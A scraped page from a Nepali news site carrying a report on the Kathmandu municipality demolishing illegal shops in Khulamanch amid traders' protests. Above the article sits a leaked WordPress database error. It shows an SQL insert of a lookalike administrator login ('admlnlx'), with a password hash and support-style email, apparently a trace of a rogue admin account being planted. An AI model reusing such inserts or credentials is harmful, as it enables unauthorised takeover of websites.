WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcaWc5L7eyRjXgTt2sccQliOX2r/en1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 17:23:14', '', 'admlnlx', 'admlnlx')

व्यापारीहरुको अवरोधका बीच चल्यो खुलामञ्चमा डोज – Gaule Khabar

व्यापारीहरुको अवरोधका बीच चल्यो खुलामञ्चमा डोज

व्यापारीहरुको अवरोधका बीच चल्यो खुलामञ्चमा डोज

गाउँले न्यूज, १४ बैशाख, काठमाडौं । खुलामञ्च अतिक्रमण गरेर बनाइएका सटर व्यापारीहरुको अवरोधका बीच भत्काइएको छ ।

काडमाडौं महानगरपालिकाले डोजर परिचालन गरेर ठेकेदारले नियम विपरित बनाएका पसलमा शनिबार भत्काएको हो । महानगरपालिकाकी उपप्रमुख हरिप्रभा खड्कीले महानगरपालिकाको निर्णयमा भन्दा पनि ‘माथिको आदेश’ डोजर चलाइएको बताए । तर कहाँबाट आदेश आएको हो भन्नेबारे उनले खुलाएनन ।

खुलामन्चमा डोजर चल्दा चर्को पैसा तिरेर सटर भाडामा लिएका व्यवसायीहरुले अवरोध गर्ने प्रयास गरेका थिए ।

खुलामञ्चमा ठेकेदार मनोजकुमार भेटवालको जलेश्वर स्वच्छन्द विकोई विल्डर्सले अवैध सटर बनाएर व्यापार थालेको थियो । जसमा महानगरको समेत मिलेमतो रहेको खुलासा भएको थियो । भेटवालले खुलामञ्चभित्र करिब ४० वटा सटरहरु बनाएको र अरु संरचनापनि विस्तारको तयारी थालेका थिए ।

व्यापारीले अवैध ती सटर तीनदेखि १० लाख रुपैयाँ माथिसम्ममा खरिद गरेका थिए भने सटरको भाडा प्रतिमहिना ८ देखि १२ हजारसम्म तोकिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका